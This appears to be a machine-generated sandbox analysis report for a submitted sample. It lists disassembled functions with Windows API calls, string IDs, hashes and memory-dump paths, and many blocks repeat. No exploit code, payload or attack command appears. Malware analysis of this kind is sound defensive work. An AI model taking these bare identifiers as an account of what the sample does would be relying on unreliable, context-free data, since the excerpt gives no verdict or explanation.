                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                        • Opcode ID: e39fab1c60ae37537c44ec02276b8c109e6865bf2b0d079dfb2c5d12bedd2935
                                                                                                                                                                        • Instruction ID: c285bb607e678ed14a4308f0440420df5353ad1f264d3db59fc5a3e5b47c816f
                                                                                                                                                                        • Opcode Fuzzy Hash: e39fab1c60ae37537c44ec02276b8c109e6865bf2b0d079dfb2c5d12bedd2935
                                                                                                                                                                        • Instruction Fuzzy Hash: 23B16E31610608DFDB14CF18D59AB657BE0FF45364F2A8659E8EACF2A1C335E981CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C27500 Relevance: 1.8, Strings: 1, Instructions: 521COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionRaise__floor_pentium4
                                                                                                                                                                        • String ID: unordered_map/set too long
                                                                                                                                                                        • API String ID: 996205981-306623848
                                                                                                                                                                        • Opcode ID: 01c052dfe2774be74f53209eed02d8558f63ae7b2865e74b121b7fa6ff3a463e
                                                                                                                                                                        • Instruction ID: af13821673783f64a6f0c16bcbb24cd215022256e40ffffc29c4a58511df1645
                                                                                                                                                                        • Opcode Fuzzy Hash: 01c052dfe2774be74f53209eed02d8558f63ae7b2865e74b121b7fa6ff3a463e
                                                                                                                                                                        • Instruction Fuzzy Hash: C812E171A042199FCB14DF69D881AADFBF5FF48310F14826AE815EB791D730EA51CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8270 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,00BD69C7,?,?,?,?,?,?,?,?,00BD6838,?,?), ref: 00BD82C0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4255912815-0
                                                                                                                                                                        • Opcode ID: 7d1db669a6b6dca841b7b81f278cc64a49d94b0c39c9918a67f62d600e2c0558
                                                                                                                                                                        • Instruction ID: 543bf414e0c8e78ab5f5d723ae697b10e6282b94d2ef7b8203bbc0d364c5b0df
                                                                                                                                                                        • Opcode Fuzzy Hash: 7d1db669a6b6dca841b7b81f278cc64a49d94b0c39c9918a67f62d600e2c0558
                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0EC30008045DEE3018B58C858A6AFBFAFB44303F4845E7E48CC61A4EB359E48CF04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCEE70 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \
                                                                                                                                                                        • API String ID: 0-2661760580
                                                                                                                                                                        • Opcode ID: caedae0df7b1b49e294ab011711e9d5728cd33889756f79b74aa4d23a063705a
                                                                                                                                                                        • Instruction ID: 482ac49154ea3cf4acbfbbd6d3cc0a2d933d995282ba5934f05241bcfda32533
                                                                                                                                                                        • Opcode Fuzzy Hash: caedae0df7b1b49e294ab011711e9d5728cd33889756f79b74aa4d23a063705a
                                                                                                                                                                        • Instruction Fuzzy Hash: CA31D0B1405B84CEE321CF29C558787BFF0BB05728F104A4DD4E65BB91D3BAA548CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D9CE19 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 063ac306297a1acae322703489ab27f4154fd2a46d84afb9b53220a41c955082
                                                                                                                                                                        • Instruction ID: c97075aadab9eb55ad217183f7ba564e6a2724da877d36cc0593fa33a4fec1db
                                                                                                                                                                        • Opcode Fuzzy Hash: 063ac306297a1acae322703489ab27f4154fd2a46d84afb9b53220a41c955082
                                                                                                                                                                        • Instruction Fuzzy Hash: D8320631D29F414DDB639639CC22335A28AAFB73D4F15D727F81AB59A9EB29C4C34210
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D88A2C Relevance: .4, Instructions: 388COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c329d795ea00013d229120067f8a766c0f0fd4eb8a6d35e16fc4c4cd0021b93a
                                                                                                                                                                        • Instruction ID: 8485c0087ca013db32c3492ba1f2552479c629ed7f5b2324fdf38a3106202f5c
                                                                                                                                                                        • Opcode Fuzzy Hash: c329d795ea00013d229120067f8a766c0f0fd4eb8a6d35e16fc4c4cd0021b93a
                                                                                                                                                                        • Instruction Fuzzy Hash: 20E1AF746006058FCB28EF68C580A7EB7F1FF45310BA84A5ED4969B291DB31ED42EB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC8280 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 665de91e1ab19aeb1733474b606833366550689f13d45cbcb88c7976b9265d0e
                                                                                                                                                                        • Instruction ID: be89f5615487d5125835c9a13bdcf93fb64cdd7d9227d4ceef84aec053ae858b
                                                                                                                                                                        • Opcode Fuzzy Hash: 665de91e1ab19aeb1733474b606833366550689f13d45cbcb88c7976b9265d0e
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F2149B1804788CFD710CF69C904B8ABBF4FB49318F11869ED455AB791D3B9AA48CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC8840 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: cfce24a6b0e2cf1fa681d45dd5a45fff5e71c9696da1e88de0f375baf821b3bb
                                                                                                                                                                        • Instruction ID: 0bf61f40052a3e4085a6e8a20b2c41d9d430c395d3766ee09eb722d8a4b1c3dd
                                                                                                                                                                        • Opcode Fuzzy Hash: cfce24a6b0e2cf1fa681d45dd5a45fff5e71c9696da1e88de0f375baf821b3bb
                                                                                                                                                                        • Instruction Fuzzy Hash: D8215BB1804788CFD710CF69C90478ABBF4FB49314F11869ED455AB7A1D3B9AA48CF90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D9A0DB Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: eebe57e863219ab4253d290da95e945bba0299a685f2a2e6ec168446fc436cd8
                                                                                                                                                                        • Instruction ID: 4f36de0eb21bc853555c07494150d3208869b880e59f6665c7f2e340e903dd02
                                                                                                                                                                        • Opcode Fuzzy Hash: eebe57e863219ab4253d290da95e945bba0299a685f2a2e6ec168446fc436cd8
                                                                                                                                                                        • Instruction Fuzzy Hash: 77F030326113249FCF2ACB4CD956A59B3A8EB45B61F51405AF501E7251C670DD00C7E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D9A11F Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                                                                        • Instruction ID: f4b6866c820b801f57025036b55a550c109e19236f1082453cc734f911646160
                                                                                                                                                                        • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                                                                        • Instruction Fuzzy Hash: CFE08C32912228EBCB14DB9CC95498AF3ECEB45B40F15049AF501E3200C270DE40C7E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D8B5D7 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 16a962eb7063aa5dac9a286c1eb4be0eb6ad47394398426903ba7e2235a18e8e
                                                                                                                                                                        • Instruction ID: e4e8b65bfc718d184d3039c900df7d581cbe82ee76244d025d320fc1b0cc6bf8
                                                                                                                                                                        • Opcode Fuzzy Hash: 16a962eb7063aa5dac9a286c1eb4be0eb6ad47394398426903ba7e2235a18e8e
                                                                                                                                                                        • Instruction Fuzzy Hash: F9C08C34000A804BCE29A918C3B23A67354F391792F8824CEC9020BB43EA1EEC82D731
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD61C0 Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 414libraryloaderthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00E9C5D0,1FC3D414,00000000), ref: 00CD6363
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E9C5D0,1FC3D414), ref: 00CD6378
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00CD6385
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00CD6393
                                                                                                                                                                        • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00CD642D
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00CD6434
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CD6448
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00CD667E
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E9C5D0,?,00000000), ref: 00CD67BC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
                                                                                                                                                                        • String ID: *** Stack Trace (x86) ***$,_$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                                                                                                                                        • API String ID: 1326996155-1203891687
                                                                                                                                                                        • Opcode ID: 4a8b71fc080526ce5ce7b29557c152201a0a4796463cd95bc01b9f8a421455a7
                                                                                                                                                                        • Instruction ID: c2782720e15a6f59f50ba0047e59aa022223e5e8ef634ebb1547efd29cc555fa
                                                                                                                                                                        • Opcode Fuzzy Hash: 4a8b71fc080526ce5ce7b29557c152201a0a4796463cd95bc01b9f8a421455a7
                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF1F2719006589FDB24EF24CC88BAEB7B4EF44304F1442EAE559A7291DB759F88CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD62F0 Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 296libraryloaderthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00E9C5D0,1FC3D414,00000000), ref: 00CD6363
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E9C5D0,1FC3D414), ref: 00CD6378
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00CD6385
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00CD6393
                                                                                                                                                                        • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00CD642D
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00CD6434
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CD6448
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00CD667E
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E9C5D0,?,00000000), ref: 00CD67BC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
                                                                                                                                                                        • String ID: *** Stack Trace (x86) ***$,_$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                                                                                                                                        • API String ID: 1326996155-1203891687
                                                                                                                                                                        • Opcode ID: f8dc8248f7df242b1e0cd893e5eaf8fa9a2d26ba989750d6c89d87a2a5669bf4
                                                                                                                                                                        • Instruction ID: f8550313a08c35e79f09b44c27ad408fa4dec4be8bf2ba4e9d8d7240ee2ea175
                                                                                                                                                                        • Opcode Fuzzy Hash: f8dc8248f7df242b1e0cd893e5eaf8fa9a2d26ba989750d6c89d87a2a5669bf4
                                                                                                                                                                        • Instruction Fuzzy Hash: 7DD1DD719006689FDB20DF24CC89BEEBBB4AF44305F1041DAE549B7291DBB56B88CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CFF8F0 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 264filetimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00E994D0,1FC3D414,00000010,?), ref: 00CFF92C
                                                                                                                                                                          • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,1FC3D414,00000010,?), ref: 00CFF939
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CFF96B
                                                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CFF974
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00DF1D8D,38E9084D,?,00000000,00E1326C,00000001,?,00000000,?,00000000), ref: 00CFF9F6
                                                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CFF9FF
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CFFA35
                                                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CFFA3E
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00CE4613,94D0B9FF,?,00000000,00E15F2C,00000002,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CFFA9F
                                                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CFFAA8
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CFFAD8
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                        • GetLocalTime.KERNEL32(?,1FC3D414), ref: 00CFFB6E
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
